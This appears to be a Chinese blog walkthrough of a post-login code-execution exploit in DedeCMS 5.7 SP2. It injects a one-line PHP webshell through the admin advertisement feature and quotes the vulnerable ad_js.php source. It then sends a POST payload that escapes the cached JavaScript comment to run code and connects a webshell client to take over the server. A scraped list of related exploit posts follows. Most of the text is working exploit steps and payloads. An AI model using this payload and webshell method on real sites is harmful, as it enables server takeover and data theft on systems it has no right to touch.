Dedecms 5.7 SP2后台广告管理处getshell
Dedecms 5.7 SP2后台广告管理处getshell
dedecms版本可以到织梦官网下载:http://www.dedecms.com/products/dedecms/downloads/
1、搭建成功,后台管理系统
2、进入后台后,找到广告,新增一个广告
3、填写广告内容,嵌入一句话木马
4、提交,抓包,发现添加成功
5、查看广告代码,有相应的地址 /DedeCMSv5/src/plus/ad_js.php?aid=3
6、访问,并查看页面源代码
http://127.0.0.1:82/DedeCMSv5/src/plus/ad_js.php?aid=3
7、查看代码ad_js.php
<?php
/**** 广告JS调用方式** @version $Id: ad_js.php 1 20:30 2010年7月8日Z tianya $* @package DedeCMS.Site* @copyright Copyright (c) 2007 - 2010, DesDev, Inc.* @license http://help.dedecms.com/usersguide/license.html* @link http://www.dedecms.com*/require_once(dirname(__FILE__)."/../include/common.inc.php");if(isset($arcID)) $aid = $arcID;
$arcID = $aid = (isset($aid) && is_numeric($aid)) ? $aid : 0;
if($aid==0) die(' Request Error! ');$cacheFile = DEDEDATA.'/cache/myad-'.$aid.'.htm';
if( isset($nocache) || !file_exists($cacheFile) || time() - filemtime($cacheFile) > $cfg_puccache_time )
{$row = $dsql->GetOne("SELECT * FROM `#@__myad` WHERE aid='$aid' ");$adbody = '';if($row['timeset']==0){$adbody = $row['normbody'];}else{$ntime = time();if($ntime > $row['endtime'] || $ntime < $row['starttime']) {$adbody = $row['expbody'];} else {$adbody = $row['normbody'];}}$adbody = str_replace('"', '\"',$adbody);$adbody = str_replace("\r", "\\r",$adbody);$adbody = str_replace("\n", "\\n",$adbody);$adbody = "<!--\r\ndocument.write(\"{$adbody}\");\r\n-->\r\n";$fp = fopen($cacheFile, 'w');fwrite($fp, $adbody);fclose($fp);
}
include $cacheFile;
8、进入hackabr环境,添加postdata,nocache=1&123=echo ‘–>’;phpinfo();
(此处省略较多代码审计过程,其中123是前面一句话木马的密码)
9、经验告诉我们,执行代码后,写入的“恶意“代码文件存放之/data/cache目录下
10、找到这个文件,用菜刀连接,连接成功,成功拿下shell
Dedecms 5.7 SP2后台广告管理处getshell相关推荐
- php中%3c w() %3e,DedeCMS V5.7 SP2后台存在代码执行漏洞
原标题:DedeCMS V5.7 SP2后台存在代码执行漏洞 *本文原创作者:风炫520,本文属FreeBuf原创奖励计划,未经许可禁止转载 简介 织梦内容管理系统(DedeCms)是一款PHP开源网 ...
- dedecms v5.7 sp2代码执行漏洞复现
环境搭建 DeDeCMS官网:http://www.dedecms.com 网站源码版本:DedeCMS V5.7 SP2正式版 程序源码下载:http://www.dedecms.com/produ ...
- dedecms织梦系统后台验证码图片不显示的解决方法
dedecms织梦系统后台验证码图片不显示的解决方法 参考文章: (1)dedecms织梦系统后台验证码图片不显示的解决方法 (2)https://www.cnblogs.com/afish/p/40 ...
- 友点 CMS V9.1 后台登录绕过 GetShell
声明:本公众号大部分文章来黑白之间安全团队成员的实战经验以及学习积累,文章内公布的漏洞或者脚本都来自互联网,未经授权,严禁转载. 请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作 ...
- DeDeCMS v5.7 SP2 前台任意用户密码修改漏洞复现
DeDeCMS v5.7 SP2 前台任意用户密码修改漏洞复现 一.漏洞概述 1.简介 织梦内容管理系统(DedeCms) [1] 以简单.实用.开源而闻名,是国内最知名的 PHP 开源网站管理系统, ...
- 织梦防html5,织梦dedecms预防网站里的广告被浏览器阻止的方法
大家在运营Dedecms程序的时候,网站里会设置一些广告,很多浏览器也会自动屏蔽网站自带的广告内容,为此很多站长们都很头疼这件事,为此脚本之家小编从技术那里索取了一段JS代码,屡试不爽哦,在这里就贡献 ...
- php 验证码不正确,dedecms织梦网站后台登录一直提示验证码不正确
原标题:dedecms织梦网站后台登录一直提示验证码不正确 有时候我们在登陆织梦网站后台的时候,我们按照上面显示的验证码进行输入:但是后台一直不能登录成功,一直提示验证码不正确,就是登不进去,但是我明 ...
- DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改漏洞复现
文章目录 简介 漏洞限制 影响版本 复现环境 工具准备 一.搭建网站 二.打开服务器代理 三.复现过程 注意 简介 织梦内容管理系统(DedeCms) [1] 以简单.实用.开源而闻名,是国内 最知名 ...
- dedecms右侧悬浮_织梦dedecms网站上添加漂浮广告
在织梦dedecms的网站上添加漂浮广告其实很简单,这篇文章主要讲的是在织梦网站首页添加漂浮广告. 我们用本地搭建的织梦默认模板演示. 1.准备一个广告图片 准备一个广告图片,命名为漂浮.gif ,设 ...
最新文章
- Java 对象的理解
- Ajax无刷新实现图片切换特效
- python在线工具-6 种 Python 数据可视化工具
- Day1 -Python program
- 给网游写一个挂吧(三) – 启动外挂下
- android studio json插件_热门Android Studio 插件,这里是Top 20
- python选定区域设置边框_Python教程:巧用openpyxl为指定区域设置边框为粗匣框线...
- mysql添加临时索引_mysql 中添加索引的三种方法
- 应急响应系统日志及日志分析四
- java测试接口_Java测试普通Java接口记录-TestHrmInterface
- PAT考前准备篇:目标满分
- pytorch系列(八):猫狗大战3-单机多卡无脑训练
- Install YouTube-DL – A Command Line Video Download Tool for Linux
- 5G消息真的来了!上海开启试商用!(附5G消息关键数据)
- 基于Qt、FFMpeg的音视频播放器设计二(FFMpeg视频处理)
- MYSQL复制表结构及数据到新表
- C# 学习笔记 1.初识
- sql查询数据库中所有表名
- 暑假小制作——DIY蓝牙小音箱
- 华米科技再发“芯”品,能否唤起智能穿戴设备生态繁荣?